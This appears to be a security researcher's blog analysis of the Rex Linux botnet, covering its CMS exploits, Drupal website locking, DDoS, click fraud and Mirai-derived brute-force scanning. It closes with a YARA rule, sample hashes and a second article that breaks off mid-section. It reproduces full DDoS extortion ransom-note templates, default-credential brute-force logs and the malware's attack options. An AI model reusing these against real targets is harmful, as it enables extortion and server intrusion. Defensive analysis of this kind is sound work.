illustration by Craig Simmons

Octopus-Rex. Evolution of a multi task Botnet

Introduction

During the last decade, different types of malware have been targeting Linux servers; Elknot, Encoder, Mirai, LuaBot, NyaDrop, Gayfgt etc. Most of them are used for DDoS purpose but there are some exceptions. Rex is one of them.
In this article we’ll try to present a detailed analysis of Rex.
Rex is a new malware developed in Go. Monitoring its activity over the last seven months brought out the efforts for developing various features.

Malware overview

Rex is a hybrid between a malware and a tool. The behavior depends on a list of arguments.
You can use it in two different ways:
– Scan mode: with the “scan” command line argument, the binary file uses embedded exploits to infect new Linux servers.
– Without scan mode: Rex contacts other bots through P2P protocol (DHT over HTTPS) and waits for commands.
Rex is always installed as a hidden file in the directory /tmp/, the malware does not have persistence mechanisms or any other hiding features. Quite the contrary, a help menu is available (-h).

benkow@stormshield:/home/rex/tmp$ ./.Z9g5aas0p0 -h
Usage of ./.Z9g5aas0p0:
  -debug
        enable debugging
  -elevate.ignore string
        credentials to ignore during elevation (default "root")
  -elevate.skip
        skip elevation (default true)
  -ipc
        enable stdio ipc
  -log.dht
        log DHT requests
  -log.http
        log HTTP requests
  -socks string
        SOCKS5 proxy address
  -strategy string
        scan strategy [random, sequential] (default "random")
  -target string
        target(s) (default "0.0.0.0/0")
  -wait int
        wait for PID to exit before starting (0: disable)
  -wordpress.pingback
        enable WordPress Pingback

The help menu describes all the features available for both modes (scan or c&c).
Arguments details:
– Debug/log: launch the malware in debug mode, it is useful for analysis.
– Elevate: Rex can try to run itself as root by bruteforcing SSH service, you can ignore specific credentials with elevate.ignore pwd
– Ipc: we have not seen this feature used yet
– Socks: launch Rex through a socks proxy
– Strategy: configure how Rex scan IPs (random or sequential)
There are also some hidden arguments. You can use Rex as a DDoS tool with the argument “–stresser target”.
The main process is used for malware communication, when the bot master sends a command, the main process forks with the command in argument.
This is why, when you look at an infected host, Rex uses several processes:

Development cycle

Rex is a very active botnet. The binary file is updated on a daily basis. We’ll try to give an overview seven months of new features (click to enlarge).

Once upon a time… Rex – April 2016

The first version (a808a6e45d4f3837fcf30a28f6594ffff320f9b994eb35f7e915dd9d954c912c) was spotted at the end of April 2016.
Due to debug logs, we know that the malware is built on “/home/ubuntu/src/rex/”.

Exploits

The first version was mainly used for infecting a first group of servers. It contained several exploits but no useful features.
Rex tries to infect other servers via Web based exploits (WordPress, Drupal…).
In order to exploit a remote file inclusion vulnerability, the remote file is hosted on infected machines on port 5099. I.E.: https://%s:5099/payload/php/%s/wp-gwollegb/ for gwollegb RFI exploit.

Drupal

Rex infects Drupal websites via CVE-2014-3704, a SQLi that allows an attacker to change the admin password. It serves two purposes, first getting access to the server and second locking the website in order to ask for a ransom.
After exploitation, Rex wrote a blogpost on the homepage with the following message:
“Website is locked. Please transfer 1.4 BitCoin to address 3M6SQh8Q6d2j1B4JRCe2ESRLHT4vTDbSM9 to unlock content.”
In the first version, Drupal locker was the only “visible” feature.

WordPress

Rex embeds the following WordPress plugins exploits
– Revslider
– Site-import
– Brandfolder
– Squirrel
– Robo-gallery
– Gwolle
– Woocommerce
– Issu panel

Hereafter is an example of infection:

sf

In this example, Rex exploits a Revslider WordPress module in order to upload a zip file Showbiz.zip / revslider.zip which contains a PHP script used for PHP verification:

<?php print(ini_get('safe_mode').'|'.ini_get('safe_mode_exec_dir').'|'.ini_get('disable_functions').'|'.ini_get('open_basedir'));;die('ok - h5tmVOxiMH');?>

If everything is ok, Rex binary file is uploaded and the server is infected.

Kerner

Rex embeds a module called “Kerner” in reference to blog “Kerner on security”. This module is a Remote Code Execution in CCTV-DVR

Jetspeed

Rex embeds 2 Jetspeed vulnerabilities (CVE-2016-0709 CVE-2016-0710). These exploits are flagged as “TODO” and are not functional yet.

“We are armada collective” – May 2016

After one month, the bot master has uploaded the first big update with an interesting feature: a Ransom note sent to the Drupal admin. (21-05-2016) 92651d4a11a43a9043a8126f2ada1e5bf1e00cb506d46c939e20f3ece93cb81d

We are Armada Collective.
All your servers will be DDoS-ed starting {{ .Time.Weekday.String }} ({{ .Time.Format "Jan 2 2006" }}) if you don't pay {{ .Amount }} Bitcoins @ {{ .Address }}
When we say all, we mean all - users will not be able to access sites host with you at all.
If you don't pay by {{ .Time.Weekday.String }}, attack will start, price to stop will increase by {{ .Step }} BTC for every day of attack.
If you report this to media and try to get some free publicity by using our name, instead of paying, attack will start permanently and will last for a long time.
This is not a joke.
Our attacks are extremely powerful - sometimes over 1 Tbps per second. So, no cheap protection will help.
Prevent it all with just {{ .Amount }} BTC @ {{ .Address }}
Do not reply, we will probably not read. Pay and we will know its you. AND YOU WILL NEVER AGAIN HEAR FROM US!
Bitcoin is anonymous, nobody will ever know you cooperated.

Interesting fact with this ransom note, CloudFlare reported detection of this threat in March 2016. But we spot the first version of Rex with this ransom note at the end of May 2016.
A deeper look at the ransom note shows that it is not exactly the same; we have the same bullshit about 1Tb DDoS attacks but sender email is different (we’ve seen armada-collective@gmail.com / armada-collective@hotmail.com and CloudFlare see armada.collective@openmailbox.org ).
This coincidence lets us thinks that Rex developers have done some tests with this threat before creating Rex. At this time no real DDoS feature were present in the binary file.
Three days after (24-05-2016), another update came with one real DDoS implementation, DnsAmpl.

Optimizations time – June 2016.

During June 2016 we did not notice important updates, but we have seen that the bot master has refactored the source code until the end of June.
At the end of June, Rex has implemented a complete “stresser” module. Now the malware supports many different DDoS types (HTTP, SlowLoris, DNSAmp…) and the builder moved on another machine “/home/user/src/rex/”.

“We are anonymous” – July 2016

Some days after (09-07-2016) Rex added 3 new exploits:
– Drupal RESTWS REC exploit
– Magento RCE exploit (CVE-2015-1397)
– Airos Arbitrary File Upload Exploit
The ransom note has been rewritten. Now they did not mention Armada Collective anymore but call themself “anonymous”.

FORWARD THIS MAIL TO WHOEVER IS IMPORTANT IN YOUR COMPANY AND CAN MAKE DECISION!
We are Anonymous.
All your servers will be DDoS-ed starting {{ .Time.Weekday.String }} ({{ .Time.Format "Jan 2 2006" }}) 
if you don't pay {{ .Amount }} Bitcoins @ {{ .Address }}
When we say all, we mean all - users will not be able to access sites host with you at all.
Right now we will start 15 minutes attack on your site's IP {{ .IP }}. It will not be hard, 
we will not crash it at the moment to try to minimize eventual damage, 
which we want to avoid at this moment. It's just to prove that this is not a hoax. Check your logs!
If you don't pay by {{ .Time.Weekday.String }}, 
attack will start, price to stop will increase by {{ .Step }} BTC for every day of attack.
If you report this to media and try to get some free publicity by using our name, 
instead of paying, attack will start permanently and will last for a long time.
This is not a joke.
Our attacks are extremely powerful - sometimes over 1 Tbps per second. So, no cheap protection will help.
Prevent it all with just {{ .Amount }} BTC @ {{ .Address }}
Do not reply, we will probably not read. Pay and we will know its you. AND YOU WILL NEVER AGAIN HEAR FROM US!
Bitcoin is anonymous, nobody will ever know you cooperated.

The ransom note tries to be more credible, It ask for log checking. Something it could not do before because of the lack of DDoS feature. But it is not enough to earn money. We checked some bitcoin addresses and all these wallets were empty.

BTCBrute and Clicky – August 2016.

Early in August, two new important updates came. The malware size has increased of 1.5mo and now embeds a bitcoin miner based on Btcsuite and a click fraud module called “clicky”.
The click fraud part is really interesting. Rex uses the botnet to display ads hosted on a-ads.com. The game here is to use each bot for clicking on ads and earn money from advertiser. The good news is that it is easy to track ads campaign of a-ads and to retrieve nice statistics.
We have spotted three ad units: 218355 (code name “Unicorns!”), 261029 (code name “Porkupines!”) and 251270 (code name “Ferries!”). Two of them are associated to the bitcoin address 1HebiSQX2WfE2kXUuva79US4zNUxcYrHjZ and the last one used 1Q6mA6ERbwmaHX1nYwkrKuDiVjCYe2xma3.

unit 218355 - income details
unit 218355 – income details

unit 218355 - impressions details
unit 218355 – impressions details

The ads displayed looks like:

At the time we wrote this article, the clicky module has generated ~1€.

History of a fail – September 2016.

At the end of August, the first big fail of Rex starts (91164673cda591a9a4dec91ecda6dbb515d48df7b56108b5fa0053395c733188). Rex implements a feature for creating a lot of Instagram accounts, probably for social network fraud. But bypassing Instagram anti-spam is not so easy 🙂
First, Rex tries to use the botnet to create Instagram account via https://www.instagram.com/accounts/web_create_ajax/
Each bot used his own IP to create these fakes accounts. But Instagram has some anti-spam features and all nodes of the botnet have been blacklisted in a few minutes.

{ID: Email:oTmJzK6p@gmail.com Name:oTmJzK6p Username:oTmJzK6p Password:DU9vD} 
(via &{Addr:XXX.XXX.XX.XXX:443 Type:2 Node:<nil> 
Created:0001-01-01 00:00:00 +0000 UTC Updated:0001-01-01 00:00:00 +0000 UTC}): token
{ID: Email:oTmJzK6p@gmail.com Name:Sin4a Username:Sin4a Password:eVdU6} 
(via &{Addr:XXX.XXX.XX.XXX:443 Type:2 Node:<nil> 
Created:0001-01-01 00:00:00 +0000 UTC Updated:0001-01-01 00:00:00 +0000 UTC}): ip blacklisted

One week later, due to node blacklist, Bot master has implemented a proxy socks feature in order to bypass the Instagram blacklist.
This new feature results again in 2 fails:
– First implementation failed due to the length of the password.

{"status": "ok", "errors": {"password": ["Create a password at least 6 characters long."]}, 
"account_created": false}instagram.AccountCreate 
&{ID: Email:ZRSlnk3uH@gmail.com Name:ZRSlnk3uH Username:ZRSlnk3uH Password:A1EtB} 
(via &{Addr:X.XXX.XXX.XX:80 Type:2 Node:<nil> 
Created:0001-01-01 00:00:00 +0000 UTC Updated:0001-01-01 00:00:00 +0000 UTC}): not created

– Second fails resides in the fact that Rex uses known proxy socks list that is already blocked by Instagram.

{"status": "ok", "errors": 
{"ip": ["The IP address you are using has been flagged as an open proxy. 
If you believe this to be incorrect, please visit http://help.instagram.com/"]}, 
"account_created": false}instagram.AccountCreate 
&{ID: Email:LOT8mWL@gmail.com Name:LOT8mWL Username:LOT8mWL Password:yF7QO3} 
(via &{Addr:XXX.XX.XX.XX:80 Type:2 Node:<nil> 
Created:0001-01-01 00:00:00 +0000 UTC Updated:0001-01-01 00:00:00 +0000 UTC}): ip blacklisted

After one month of fails, we have not seen this feature used anymore by the bot master.

When Rex meets Mirai – October 2016

After seven months of life, the main problem with Rex is the low number of bots. Without a large botnet, it is difficult to make a real return on investment.
In September 2016 (4b513dfc68fe825e5f83c51fc1a023c15bf1039e48e025a0a4f4b034dbf443b9), media put light on the Mirai botnet (IoT botnet used for DDoS).
After the leak of the source code of Mirai, Rex developer tried to implement the Mirai telnet scanner in Rex.

*scanner.telnet.mirai 81.196.136.114:23 - trying ubnt:ubnt
*scanner.telnet.mirai 81.196.136.114:23 - prompt at 36 in "ubnt\r\nUser name is incorrect\r\n\rLogin: "
*scanner.telnet.mirai 81.196.136.114:23 - prompt at 38 in "enable\r\nUser name is incorrect\r\n\rLogin: "
*scanner.telnet.mirai 81.196.136.114:23 - prompt at 38 in "system\r\nUser name is incorrect\r\n\rLogin: "
*scanner.telnet.mirai 81.196.136.114:23 - prompt at 37 in "shell\r\nUser name is incorrect\r\n\rLogin: "
*scanner.telnet.mirai 81.196.136.114:23 - prompt at 34 in "sh\r\nUser name is incorrect\r\n\rLogin: "
*scanner.telnet.mirai 81.196.136.114:23 - credentials incorrect "/bin/busybox MIRAI\r\nUser name is incorrect\r\n\rLogin: "
*scanner.telnet.mirai 81.196.136.114:23 - trying 888888:888888
*scanner.telnet.mirai 81.196.136.114:23 - prompt at 38 in "888888\r\nUser name is incorrect\r\n\rLogin: "
*scanner.telnet.mirai 81.196.136.114:23 - prompt at 38 in "enable\r\nUser name is incorrect\r\n\rLogin: "
*scanner.telnet.mirai 81.196.136.114:23 - prompt at 38 in "system\r\nUser name is incorrect\r\n\rLogin: "
*scanner.telnet.mirai 81.196.136.114:23 - prompt at 37 in "shell\r\nUser name is incorrect\r\n\rLogin: "
*scanner.telnet.mirai 81.196.136.114:23 - prompt at 34 in "sh\r\nUser name is incorrect\r\n\rLogin: "
*scanner.telnet.mirai 81.196.136.114:23 - credentials incorrect "/bin/busybox MIRAI\r\nUser name is incorrect\r\n\rLogin: "
*scanner.telnet.mirai 81.196.136.114:23 - trying root:xc3511
*scanner.telnet.mirai 81.196.136.114:23 - prompt at 35 in "\r\n\rPassword is incorrect\r\n\rPassword: "
*scanner.telnet.mirai 81.196.136.114:23 - prompt at 35 in "\r\n\rPassword is incorrect\r\n\rPassword: "
*scanner.telnet.mirai 81.196.136.114:23 - prompt at 35 in "\r\n\rPassword is incorrect\r\n\rPassword: "
*scanner.telnet.mirai 81.196.136.114:23 - prompt at 35 in "\r\n\rPassword is incorrect\r\n\rPassword: "
*scanner.telnet.mirai 81.196.136.114:23 - prompt at 35 in "\r\n\rPassword is incorrect\r\n\rPassword: "

As usual, this first buggy version of Rex Telnet scanner was tested directly in the wild. Unfortunately for the bot master, after one week of telnet scanning, only few new victims were infected (less than 10). But now, when you want to retrieve Mirai sample via Honeypots, you have to be sure that it is not Rex ;).
At the end of October (25-10-2016) (1058cce9f28c2a3522c31b67e913f00f229c2e00977c979dd68237e184c6df79) an update now include an SSH scanner. The malware scan Internet for SSH and try to brute force services with the same passwords list than Mirai.

*ssh.Scanner.Scan 81.169.176.212:22 - ssh
*ssh.Scanner.Scan 103.214.68.47:22 - ssh
*ssh.Scanner.Scan 77.93.214.53:22 - ssh
*ssh.Scanner.Scan 52.19.30.202:22 - ssh
*ssh.Scanner.Scan 177.101.179.169:22 - ssh
*ssh.Scanner.Scan 23.244.38.136:22 - ssh
*ssh.Scanner.Scan 117.253.221.213:22 - ssh
*ssh.Scanner.Scan 194.97.64.9:22 - ssh
*ssh.Scanner.Scan 52.6.180.43:22 - ssh
*ssh.Scanner.login 117.253.221.213:22 root anko - version "SSH-2.0-dropbear_0.52"
*ssh.Scanner.Scan 174.142.159.136:22 - ssh
*ssh.Scanner.Scan 68.179.101.245:22 - ssh
*ssh.Scanner.login 117.253.221.213:22 [root anko]: wait: remote command exited without exit status or exit signal
*ssh.Scanner.Scan 175.25.48.200:22 - ssh
*ssh.Scanner.Scan 195.154.168.111:22 - ssh
*ssh.Scanner.Scan 93.63.138.187:2222 - ssh

Last funny fact, this version includes a set of commands used for QA and benchmarking purpose. Maybe they hired a Quality Engineer.

benkow_@stormshield:/home/rex# ./rex -h
Usage of ./rex:
  -debug
        enable debugging
  -elevate.ignore string
        credentials to ignore during elevation (default "root")
  -elevate.skip
        skip elevation (default true)
  -ipc
        enable stdio ipc
  -log.dht
        log DHT requests
  -log.http
        log HTTP requests
  -socks string
        SOCKS5 proxy address
  -strategy string
        scan strategy [random, sequential] (default "random")
  -target string
        target(s) (default "0.0.0.0/0")
  -test.bench string
        regular expression per path component to select benchmarks to run
  -test.benchmem
        print memory allocations for benchmarks
  -test.benchtime duration
        approximate run time for each benchmark (default 1s)
  -test.blockprofile string
        write a goroutine blocking profile to the named file after execution
  -test.blockprofilerate int
        if >= 0, calls runtime.SetBlockProfileRate() (default 1)
  -test.count n
        run tests and benchmarks n times (default 1)
  -test.coverprofile string
        write a coverage profile to the named file after execution
  -test.cpu string
        comma-separated list of number of CPUs to use for each test
  -test.cpuprofile string
        write a cpu profile to the named file during execution
  -test.memprofile string
        write a memory profile to the named file after execution
  -test.memprofilerate int
        if >=0, sets runtime.MemProfileRate
  -test.outputdir string
        directory in which to write profiles
  -test.parallel int
        maximum test parallelism (default 8)
  -test.run string
        regular expression to select tests and examples to run
  -test.short
        run smaller test suite to save time
  -test.timeout duration
        if positive, sets an aggregate time limit for all tests
  -test.trace string
        write an execution trace to the named file after execution
  -test.v
        verbose: print additional output
  -wait int
        wait for PID to exit before starting (0: disable)
  -wordpress.pingback
        enable WordPress Pingback

We’ll continue to monitor all these features, the developer seems to be creative.

Crawling the botnet

As reminding, Rex use DHT P2P over HTTPS for communication. Due to certificate pining failure it is easy for us to do some man-in-the-middle on the malware and then implement a crawler.
This is how looks like Rex DHT request

As you can see, Rex uses the default Go User-Agent “Go-http-client/1.1” and sends gzip encoded requests.
We know that DHT supports the following commands:
DHT.Store
DHT.Ping
DHT.FindValue
DHT.FindNode
DHT.Neighbors
So, it is easy to implement a quick crawler.
At the time of writing, despite the efforts of the bot master, the botnet is still harmless (~150 bots). Not enough for doing any significant DDoS.

We try to identify the most affected country but due to the random scan strategy this do not allow us to conclude something useful.

Conclusion

Linux malware is a trendy topics, we can find new families every week. The huge amount of vulnerable servers available and the absence of anti-virus attracts crooks on the Linux side. They can stay on a compromised server for several months without being detected. In the case of Rex, if they did not implement “visible” features like Drupal locker, the malware would still be hidden.
Regarding how the bot master uses this botnet, we can easily conclude that it may not be part of a big cyber gang, Rex Botnet looks more like an experimental botnet.
2017 promises us some funny crapware on Linux.

Annexes

Quick and dirty yara rules for VTi

rule Rex {
  meta:
    description = "Quick and dirty rule for Rex malware"
    author = "Benkow_@Stormshield"
  strings:
    $string1= {6d 61 69 6e 2e 67 6f}
    $string2 = {72 65 78}
    $string3= {64 72 75 70 61 6c}
  condition:
    all of them
}

List of hashes (unpacked version only)

f14b398584729f13317b229f06356c7fa222c11ad916a95afe78bfc20404d6a4
97c1ed3d52d663f9bad2eef716169f06053dc2bcf8e3d857b0a702e8fae546c9
762a4f2bf5ea4ff72fce674da1adf29f0b9357be18de4cd992d79198c56bb514
71d8d1a50db2bf3edce85ae5e5614dac63f9c7d2efd6494956dc8b7af3513e8d
2cca695f859b3fddf0e934c6b05334ad940aae288061b83ddab786fcb24d2ae0
1fd98eabd378aa0526a362499c14bb8c5146c2615ee4a3731146fd61bdca36b1
d67ae5639618a3409711377e124ef2c6293200aa3026b8b2996654db63645481
444284e41eea3dae1771d25c3e18d0bf8f85e3cb3658d2c3b91ea685f139bf4b
9909910d6e008e15c98d26e214f619a7a82787137158784998d99b5c03cbe8f2
dcd0e1586630bc8c50fe600899bee76b853057fd9158ed541d7ddec53c8f2186
3f53926f825d1f17999745983654cce4adb6d106d913d337920c41cc8a857a4d
ddb19f88a0f8b9f86c9b6ec5ef5bdd01a026b0ca65d59cc38fbb2b4c42811296
aa27d4ec34eb9ff93f99a3d8108e29c28b43c3719dacbe95f44c3476a142d457
06fe8decf5dfd6fe0655ff6e5156576666a7a536f53cfa2013b8d9ca11e76a84
b26781cc1011c7a844e512ad88213ea64e3470d21eda73287b8c1d6c0370dae1
2f6c54a9cb83dc72cfd14809db9d394daaa3bca1dc0b5ff73ba13501e9407ec6
08f8a4dad2ddb9e44b3371634157f302966b930f4a07504f1a7f9ba70b5310f6
d24ca01f15e7b341eb2fcc0e83a55f0c2d87343bd7c018a5236ca58040a91466
a1610e735042ce0197859e6fd7772039e63efce78d6c9cf642492d1c8f1d7540
3da2ddcef59f12f4879de1c6a0f1c6f016b1042ad2639ec2c4aa12b9c315d10f
0723de24bc86eedde149c53e0f93a18596bed424e823f1b46c2f97e358931b83
52bf6ae8fe7a0a59ca8d089444207c173e20a7a11c8b5e815b937e2f4224da4f
3e4cebd60a1d6a6b29bac68ace2547c2e3894a0e5865dd90aff5764f8e7dc16d
192a67ed44d5e7fd33ba80b90abf69e2af8a60f32cf89d77ef0dc93425695867
6428046c24aace0575c1a1443eedb7abe92ccde0fdc1f83827a54306959d0f3c
1b2ff46200ed68a210ae3a406777f6d762b5de91ab335fa6766e6514c33200e9
2934da8eb30d59c001767fb8e28ccb728af8b2c8b8258a7453b85a5b0e340254
c058d576a108bdcf637a6ed399b4d9a1e3bbb6f194882ffada01b85e79109f65
09f1967e97a97a1d0963a84823fa2611b9555866f09d7a04bb69bc4d877f9631
dbb7c4548d49207eb772ff85657a7d9a0eeec24efb6e3b85f5dc94207df4a223
40c882738ea1e01cc4e8027dd6ce5d55552e5630c8f65e86db630fca09d85fa9
69402f4bd7718a3403f1caaaa387edc70b299f6aecc06de39e3a9ac28873a184
550b9b4c5b2dbe83fa3e227cca65b9b9768e2ea597c2e109205dba51faee5869
81f1925eb2b49a0f18a6036a0cfd0385f1405d6fa0ee7a80f4162a9c6eefc5a9
950cd068d9c51b941bdfe4721a3156af15dc408d2df23c1f2bc41b87159b109e
47e9acdba48dfb1948a409b89341b45834e8c3a27cf9e01dfacc7b37c797a3ab
25ec78c719882cbfe19fbed160d8e50f25d725c6c7b7458ab42f5dda91dee203
2549560970bb8ebca0136f7d6c8111196295d083c6fd6101a7f9178089502cc0
8e7eaed42f50c865f72f7351b87a988de5aa94781b4dab4ddbe993872435f293
c53923874225931ca94799099b86ac5f68b491d3aa7f2773f224adcf6294caf7
30aaf21b1cba8cffcdb0e710316d5a0b7f67b10138997dc5f36a447d48c03a3c
04f865ddb593a39b4153b030ae723c9099a46a481e93fdbcc3bf8daea731e4b3
53a5d799f91a6b5ae4878dcdc933cb497eac57b750744998feb8f07d9f683d22
5088f65fe343d3f698765289098bd9d35c4968f113d2ad4920eeb511b075383a
a1000d4cb81cfb7dfac660722938f3d9c7cb6e36c33e129097ddd29f3dfd1890
208bfc3480b620aa39cb6da5eaf04dd9ad0665bdde16423634ae3c90e1242157
2963835a0ba3476cffd75e527bfe50dc490efae252e1cdecd581438e2fd15957
7b0e6e65d0b3c7c82eb3041505a217feb5db1702e4f284dcfdb4fe28b166c13c
3c214302047db629f6ac84e5495af21e8cb73497c587862236477b731d304640
aea3ccce007af974123c68c64dc19d6e7745f5966d7269da8e9e551551702dea
4d6563811972d1cd663e95bbdcfa06c1320445c0bbe1d370403253325d764357
2c091e180910f751813cb6169025e33161f1c0b9fe1443bf3aab40281820e331
8cb70ac6d9b7da09c30514dce788b9626f8c115d3aff9d50ca97667de1e834c4
8f5996d84577318b2081061d4dc583a2d7bea3a9d77052ac6be51ef180587608
d282f723998a4b0768a8d3e1c73997cf9ab9fcee43e4a7f0c8c76e9cff67d347
22c30799fc61601d22ab5ee5076512814eb0bcc8ea215c13e079c59c155b9412
251a2e72eee5581aafbb9d109cf0133a07b8426950de381020849347dd619f18
64c62a718a1998ead5b49b0b859253673d69135d3a2508ccd923f16fd6232fc5
2b7555bfa3794903bd59955db795213bcb5c9d678029184967ad8f71cc653980
9d41dc182dee0690e5c5f08f9276548a85f4b986478fd30ec4208d95d54cffeb
b30dfa13f8dc7162f3edb43dff8507f82c01bd5bd6e5a1ae2e3b2e55dd6b10c0
1e8341e46820af65a9fdbdcfa55b7c1556449cc99755545063082394d764eab5
46337159fc31aac4ca678d86101ab2a0f08345a6604c18c1d8071f32056cd0ad
fcd621c978e203ca3bc698f84353a0674888122a8d26bc288d28f53f1968b6d8
3606303974653b5dc9ece6700997c462192f169aa0e63f3a9c031b87370643ce
4524d20635f86743572459761fec72cac6efa5bb4a35e19426c342609505a013
a78230219df28b5274580a2fb7693bca98a2217ad5d1c25a5db2f853871a2e89
2d468ca14aa7c9367f2233197ffcd0cf3703ac6a087f5b9c06ea72eb29bc00eb
ff09e360d68a8c84646cba8898812c8d967e48ad33f0950da2492104312c7aea
0e6c53797964b611c867cb5e5b492d45edf5472924c9a60a99433240f1712f15
7ee718e31ce160126cfdc88fedd1a936b91550c3d2906927818eb7fd8ab2d149
18bbffd0e4beb9bc9b7b5c53abeaee44cc16abbffa5a3481035acd0ad26cf248
6b46b6eff4be06d47284492fed7f71c53103bfaa610952151bddebb8046a34f1
4b513dfc68fe825e5f83c51fc1a023c15bf1039e48e025a0a4f4b034dbf443b9
afaa75870b6333fa4d4c4e337dc9a2e3d9cc4493599fa21b9ad4e50d802f98b5
5c8269ab600d6ccd73f5b57871300585cf034716e61dda019132b0ac8d20a954
cb42573e36fb148bc1109229a1025cdcb375c166361605f0681da9e54e3ef81d
677464da2fcf73b9793daca3191501da02957af08a6471a047410ce99ea49405
efdb2de4f0534c1209222936d0973d2a0cc47e3b87a358718b0486da86676ce8
d097f55f82e88a32b057010c96f553aa7c8ccef12c2a8484aab0fb3dab9d4a0f
a76a5ee67521c74d72cb1e533edab048d9fa54e86dbdb65209b6d47295f59559
a3dbdc19534e24be02c8bee896664e0de611410cd37b53445480e180ced4305f
9070f56651f44ec722e17df67b8a954888e387a8f2574594c80937d0f39c471a
f141e71e98e635dec4918854bfca84bf94e24bf0ce5d54c0a3802317d8790c14
cc01ba0825208402b0fc2eb62146e856f69d1e9f53b745d8f068f0d09e6170c0
fe2c837d1662ca47ebd86c0cf0a3a382ee589bce6b77dabae30801d71a7d280f
62b5b723195abc5c75ffb03707baf9261395b429359282a3dbd8c2f00f125028
91164673cda591a9a4dec91ecda6dbb515d48df7b56108b5fa0053395c733188
daa738f9ebd1ef2899430efad81d2b870aa665a0cb322614e1880454d3215bf7
9583377cf54642118cee629e5b0fb3c708a46d584ce1e5e5121bded18e071e39
e0a198d524b7cd6995d53a9e30a88072f866ae66ecde8f5e3f1fff204d3d8a49
1f4d876b17a6d786aa793b9c529235f9f9e164d70a74d8d26ca850d18f1329a7
bf211d46551079e7f7646ffd6bfda065f1307ea81508d1625b5c65005d929cb3
695e8149fcc44529d1bac1d43424689bad247481eb1fac396f4655680f18c421
27a3e90f99b53281a955d77e2c90723471e96163612bb8dc7e42ca8ee04a61dc
7ff5625fc9eb5b9541392e93fff9fc60c801a1b4921f2bc367dcdaa42d364c6a
dbc3f96fcbbfd90f877dc11fcdedca1c1e574b951ac70edc3160ed9f389c3fd3
d3dec23f089a3b26919c0b2f35ff96c75d462fd97eb1e51937c616c4957482fd
8a7c548a47c7cbd120b2f262797834e8aa8d6441082571f5d125c9a0ed4c75d4
67a3b5d1fb946daccd7f3562e35b90537f9032184a0605cc9b8613c91a4ea1be
9bd1d3a567e2036f8e57745dd81333911b06a34f4ed6d7d68daa674aac0d7b96
08ab4abd017568142d061ffd5a2592a491730dddb4485211fda53f39d43e3efb
32c921dd4b755af519f648102098735a569a0326a79a911eb47174bd058e5c43
3dee377037f7fcfd6539c23bb1cdc6eda46680c8773525b784150c1237788965
9f568df46838872b389628b665940415d897823b2e1804e2625c3dfb0b6850b4
07dd2c7be7a0becb178967c43684c1a687deb217e87575d18fd6b73dc988bd78
f7bc5d56312ae6205b21aa4c72708383716907754b037013f47bc88203fbb450
3488881b691c8a821e97e42521289550cad4f350335fcdeeb87bcb40e9398357
2668192417516bb2ec4d9808d8a781595564fb0253ca9d3912b667074c6ca6b9
22a578f2d30f316d441b73efbeaa0b53641686d2fa75ad44d4d3992da9ceaf5f
c79d7b2a8caf5cc19a019772053c54d1ec02f8ae15b577bbbbd9bf82f19caedb
b67570b16cc22a121554a37b238447731140f90751095f2990704756c4866351
68206d74a1011e9dcaec84be471e3fa9b6a4e5f512772c00f2f990624f8f681b
339eaabda43fbf0ee0caa6021a999d383713498911523d2b21e2ee2f1541f78f
d47999ff9a33481be6ec1a6443c9a359662bf17f8aeadcb8ae9dac781be52d90
bf1f82ee300fa15a07ca02da78b1ed649877e38a613651377642b86dd0dbb40a
0e8be50f0ad59239599eaceb7a6e30cc5909d401b2ff784e670ddecca1bc29d0
ac36c87cacbe1b8327fae3084ebd1740a3a5c6c6f208c1c77da56932a9ca3be6

illustration by Craig Simmons

From website-locker to DDoS: Rex !

In May 2016, Softpedia wrote an article about a Drupal web ransomware. This malware exploits an SQL Injection on CMS Drupal, changes admin credentials and asks for bitcoins to unlock content.
website
After locking the website, a malware is executed on the server:

After this ends, the last uploaded file is a binary file written in the Go programming language, which is the actual ransomware. This Go binary deletes the file upload form and replaces it with the ransom note seen above.

3 months after this article, there was no available sample of this malware on public repositories. So, it’s time to try to find one. We only know that the malware is developed in Go and exploits Drupal vulnerabilities. Thanks to @DlBlind, we also know that it uses P2P to communicate.
Please note that this article is not a reverse of the malware but tries to explain the attack vector and some interesting key features.

Sample Hunting

Googling « Website is locked. Please transfer 1.4 BitCoin to address », we can found a lot of hacked Drupal. After a quick look, we retrieved an unknown sample executed as:

./G2eCM9jUiz -elevate.skip -wait 20619 2>/tmp/l

where the file “l” is actually a log file looking like:

*node.Node.Run "random" 8184 0.0.0.0/0
*node.Node.runScanner *node.BlacklistFilter 0x18d7e4c0 7366
*rpc.Client.SetBinary "linux-386" 0x18c0b560
serving 0.0.0.0:5099

*rpc.Service.SetBinary &{Platform:linux-386 Binary:0x1901ae40}
new neighbor 192.167.9.33:5099
new neighbor 85.158.48.35:5099
new neighbor 89.111.52.140:5099
new neighbor 193.9.245.64:5099
new neighbor 121.42.178.179:5099
new neighbor 91.121.144.123:5099
[...]

The above snippet shows that the sample uses P2P communication.

A quick analysis of the sample shows that it is developed in GO and compressed with UPX. As shown below, it is not known by any anti-virus on VT:
vt
We found our sample and it’s an interesting one. Actually, Drupal-locking is a very small part of the available feature of the self-called “Rex” malware which is still in evolution. We found many different variants from April to August 2016.
rm

Rex malware weapons

Rex is made of 5 different parts. Some of them seem to be still in development:

  • Attack vector
  • Bitcoin mining
  • C&C Communication
  • Ransom – Armada Collective
  • DDoS

Hereafter, we will look into details for each of this part.

Attack vector

Depending of the variant, Rex malware scan Internet for different vulnerable services. The kill chain is simple:

  • Bots are scanning Internet for vulnerable websites
  • Websites are infected and defaced (Drupal-locker)
  • “Rex” malware is dropped on the server
  • The server communicates with other bots via P2P.

Hereafter, a non exhaustive list of exploits used by different variants of Rex malware.

Drupal

It’s not something new, Rex can exploit an SQL injection on Drupal 7 via CVE-2014-3704. The malware adds a new admin account, locks all blogposts with website-locker notes, uploads and executes Rex.

WordPress

Rex is able to infect other CMS. WordPress plugins are mainly targeted. At least 8 exploits are available:

We have found some infected WordPress websites but we didn’t see any of them locked.

Magento

The botnet scans for Magento eCommerce too. It looks for ShopLift RCE – https://www.exploit-db.com/exploits/37977/. The attack is similar to the Drupal attack. A new admin account is created and a Webshell is used for executing Rex.

Misc

A few other exploits are shipped with Rex:

The above list confirms that Rex does not focus on website locking but tries to build a P2P botnet.

Bitcoin mining

As lots of malware, Rex has bitcoin mining capabilities. We won’t dig into details for this.

C&C communication

We haven’t looked deeper in the network part but thanks to @silascutler @DlBlind, we know that this botnet use Kademlia P2P network (“/home/user/src/rex/dht/” https://github.com/nictuku/dht ) on port 5099 with TLS enabled.
cc

It seems that all aforementioned weapons are available through the P2P network.

Ransom – Armada Collective

